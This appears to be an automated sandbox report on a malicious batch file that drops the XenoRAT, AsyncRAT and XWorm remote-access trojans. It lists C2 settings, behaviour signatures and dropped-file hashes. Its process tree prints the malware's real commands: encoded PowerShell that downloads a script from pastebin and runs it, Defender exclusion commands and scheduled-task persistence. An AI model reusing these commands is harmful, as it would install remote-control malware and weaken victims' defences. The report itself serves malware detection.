Overview

overview

10

Static

static

1

LHVWN_virus_src.bat

windows7-x64

5

LHVWN_virus_src.bat

windows10-2004-x64

10

Resubmissions

08-12-2024 23:35

241208-3k15zawkhx 10

08-12-2024 12:59

241208-p8a2ssypfk 10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2024 12:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LHVWN_virus_src.bat

  • Size

    680B

  • MD5

    28a24f08a62dc5c8af6be5e921d4c5ad

  • SHA1

    97f70c14a8e2ba4da9d8f5d65961d7d998ebb637

  • SHA256

    c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

  • SHA512

    e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Score
10/10
asyncratxenoratxwormcomppkgsrvdiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Family

xenorat

C2

82.13.154.169

Mutex

09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    4444

  • startup_name

    svchost

Extracted

Family

asyncrat

Botnet

CompPkgSrv

C2

82.13.154.169:4444

Attributes
  • delay

    3

  • install

    true

  • install_file

    CompPkgSrv.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

82.13.154.169:4444

Attributes
  • Install_directory

    %AppData%

  • install_file

    CompPkgSup.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect XenoRat Payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • Xenorat family
    xenorat
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Start PowerShell.

    execution
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4284
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3716
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2416
            • C:\Users\Admin\AppData\Local\svchost.exe
              "C:\Users\Admin\AppData\Local\svchost.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4556
              • C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
                "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2432
                • C:\Windows\SysWOW64\schtasks.exe
                  "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEC63.tmp" /F
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2056
            • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
              "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4300
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1072
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4424
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEAFC.tmp.bat""
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2348
                • C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe
                  "C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1692
            • C:\Users\Admin\AppData\Local\CompPkgSup.exe
              "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
              6⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4088
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3992
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4132
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3868
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1660
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3096
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2368
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2916
  • C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4848

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\CompPkgSrv.exe
    Filesize

    63KB

    MD5

    a2cc522bd3b0806748349c386d613b00

    SHA1

    36f14471d1e307eec0af563f5c884acbffe65284

    SHA256

    a68a6d746ffbaf79d5e43b140217f521d68efa0191f9630258c57faf9591b70d

    SHA512

    c5f108ecc7ef45b465f07f3441ad00682a9ef9caa25783af1acf00777e087e483071e323b311581ed94c3cbbf740b776a13f29374ef5c42f795e36a13c36c959

    Download Submit

  • C:\Users\Admin\AppData\Local\CompPkgSup.exe
    Filesize

    80KB

    MD5

    82ae01d348fce7ddf9f19ca5cb545ae1

    SHA1

    5b563cec5b49c7ec4082bf19aeccce9fc190bd2a

    SHA256

    4a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d

    SHA512

    6a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSrv.exe.log
    Filesize

    871B

    MD5

    d58f949aad7df2e7b55248bfdfc6e1b8

    SHA1

    6713cad396b5808b66ede2dd9b169e00d5e5018f

    SHA256

    5e1611e4d915fd9759825811fa4463f09172889f85889a2942be1561948fab8a

    SHA512

    bdddb838108c4f3f0a7737703cbde935fe26aaea97459bb099c4c773c0789997283d7f20ac7ea4ac2aedef23515afc0b251b5b461aa12d3b7a60846b87b26e38

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSup.exe.log
    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
    Filesize

    226B

    MD5

    916851e072fbabc4796d8916c5131092

    SHA1

    d48a602229a690c512d5fdaf4c8d77547a88e7a2

    SHA256

    7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

    SHA512

    07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    a26df49623eff12a70a93f649776dab7

    SHA1

    efb53bd0df3ac34bd119adf8788127ad57e53803

    SHA256

    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

    SHA512

    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    f994815edea79688903f374b373848cc

    SHA1

    122c649520fa4e5f9ee602ead7748cab2448deb1

    SHA256

    63c62fe05e690671d433399df8565a0a99d6a9d9708fc8033b8d196b672ccda4

    SHA512

    b8e9e749a88a3b8f728fddcaf6353345e8e53b2a1fc8b06f182745907c53c106bf3a530846031619d9a6c2b94a7d0468d05389e84087f447e3f377154a9e12d3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6a5650126660a2760e93e48a63a9f626

    SHA1

    35710b657094c22ed66a37854173ce2090f02caa

    SHA256

    e981ba57e2617381d8d75f0c7ffb6e836afbeb475434a06b56b9a5a988761e92

    SHA512

    4e4cc9dc507cd95d5f9ddc181f68e97e5351aa7748c574717ac4cf0ff882f7fb1c6d6460b63560db382697c44118b8c2a288e2c94c9c8457b15ca6a9b1a66ba9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    7a2a96e13462c26cc9a2b0f1922d595a

    SHA1

    70e2adf4f820220f2e1d5b84a8c2f88857da10c4

    SHA256

    665e9e6b2fe31ff680ffdc4fd111028ae663d2a9d99c3ef5aa4158b9f88fb73b

    SHA512

    3db783999d0322e17decb6d6b090684467be1e933bd68dc17a62ca4b0c632e3464a23448c1c97e34d340d21223baa51846e066323f7ec47b955f1f7dc1dbe948

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    3ca1082427d7b2cd417d7c0b7fd95e4e

    SHA1

    b0482ff5b58ffff4f5242d77330b064190f269d3

    SHA256

    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

    SHA512

    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    94af78d295fb3dfe76397aa481c33845

    SHA1

    314f4100021ba93a64dd62fcb895d4d50b93af12

    SHA256

    328b9f28515a4c00fcf1f8432a0a965fcf5866b0bd7abbafd5a17c3e10802f61

    SHA512

    3f95a9ad4a4e8b923872fad42df64ba085f1ae95baedfb9dca857a6eb56ea9dd37437535d5efd6e778ac2ebdd26e963c2fc03969309d8bc2546f8eb2c949797a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pubphwsk.dmh.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpEAFC.tmp.bat
    Filesize

    154B

    MD5

    94c663278061e050c99cd3729786f6a5

    SHA1

    770036f40565ee2dc7930da529796d8efd52e468

    SHA256

    b486b365bc64d8651298ae4ae426a8ceb1fceae0c108793ec11df5f6518a9f9f

    SHA512

    52a61fc4c4fce34f76cfed62c9e3fda357a96b506333c5e30ff7d2884c67c77daea5c99572723c18a68b8ef2c21c60e3ca0ad3f481b4e4c70a24ebedb0a9eeea

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpEC63.tmp
    Filesize

    1KB

    MD5

    9cb9f8ba5ba99c36d5ba7ee5a98f0bd9

    SHA1

    4bb53c5f5d4f208a4082b59b0c4b5185866cd874

    SHA256

    dd802183599f6403ef3ae4832781d6fa687765b45a1d19d2fba947c41a51ee3c

    SHA512

    eb8c9e078ba0b43d5256b7df4b4db16a45b954db118826b5629243025eeefa856e8c50d4451c13473290c2a707066c6bfa7173fc230daa13d87e7a4b7ec22f76

    Download Submit

  • C:\Users\Admin\AppData\Local\svchost.exe
    Filesize

    46KB

    MD5

    31ee6e006c02625385210da20ce4b522

    SHA1

    e13ae10bd9300fd4608f8fc697e789b9712c1a75

    SHA256

    35edd93f3f9f6e21c6d88e50e475960290dacbba2c8d19cb74bb1b85fde24c2c

    SHA512

    46aca18f2af78401b3d39c28b2d87de4d44c7661bbc4a129f0af840075ad2e2becf4d144fc98292efb909763543c64a4801f921c1b71232ac2cc4911224c77e4

    Download Submit

  • C:\Users\Admin\AppData\Local\sysboot.ps1
    Filesize

    1KB

    MD5

    81f7df2e0aa206d331d8987c1035cef1

    SHA1

    51e8454a79b2f8127d96663c6a74f88b1f139f2a

    SHA256

    4d2b4b4d6950791e6bcd8715c970bf7e19a0e33530818a6f17f602c785b0ec6a

    SHA512

    6defa54b76c38545de4b3b031b25191ddf67ff5e95c7e0004305012d9c87c8ea6dde10e30f9d1caceb70ad7caef61063ddc6aec40c755be96b8e730d712b132d

    Download Submit

  • memory/2416-105-0x000001D2FF960000-0x000001D2FF9D6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/2416-54-0x000001D2FF890000-0x000001D2FF8D4000-memory.dmp

    Filesize

    272KB

    Download

  • memory/2592-28-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2592-29-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2592-30-0x0000023EA2CD0000-0x0000023EA3476000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/2592-34-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2592-17-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4088-104-0x0000000000FA0000-0x0000000000FBA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4284-0-0x00007FF940713000-0x00007FF940715000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4284-15-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4284-12-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4284-11-0x00007FF940710000-0x00007FF9411D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4284-1-0x00000277F78B0000-0x00000277F78D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4300-92-0x0000000000BF0000-0x0000000000C06000-memory.dmp

    Filesize

    88KB

    Download

  • memory/4556-67-0x00000000002C0000-0x00000000002D2000-memory.dmp

    Filesize

    72KB

    Download